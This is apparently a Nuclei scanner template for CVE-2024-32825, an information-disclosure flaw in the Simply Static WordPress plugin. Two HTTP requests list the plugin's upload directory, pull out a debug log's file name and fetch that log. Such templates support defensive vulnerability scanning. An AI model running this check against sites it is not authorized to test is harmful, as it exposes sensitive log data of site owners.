Simply Static - Information Disclosure

id: CVE-2024-32825

info:
  name: Simply Static - Information Disclosure
  author: pussycat0x
  severity: medium
  description: |
    Patrick Posner Simply Static versions up to 3.1.3 contain a vulnerability for insertion of sensitive information into log files caused by improper handling of log data, letting attackers potentially access sensitive information, exploit requires no specific privileges.
  impact: |
    Attackers can access sensitive information stored in log files, leading to information disclosure.
  remediation:
    Update to the latest version of Simply Static that addresses this issue, or apply available patches.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/simply-static/simply-static-313-unauthenticated-information-exposure
    - https://www.cve.org/CVERecord?id=CVE-2024-32825
    - https://plugins.trac.wordpress.org/changeset/3025775/simply-static
  metadata:
    verified: true
    publicwww-query: "/wp-content/plugins/simply-static/"
  tags: cve,cve2024,wordpress,wp-plugin,simply-static

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Index of", "debug.txt")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: debug_file
        regex:
          - '([0-9a-z]+)\-debug\.txt'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/simply-static/{{debug_file}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, ".php")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c0aa4db2bfcaa22fc8d0298ad61088b9a61e334ffe8356db0d70139316fd312d02200bdadada3fc8daeddb3e1467bbcc3544acb1bebec120827f285f8c23cf5569fc:922c64590222798bb761d5b6d8e72950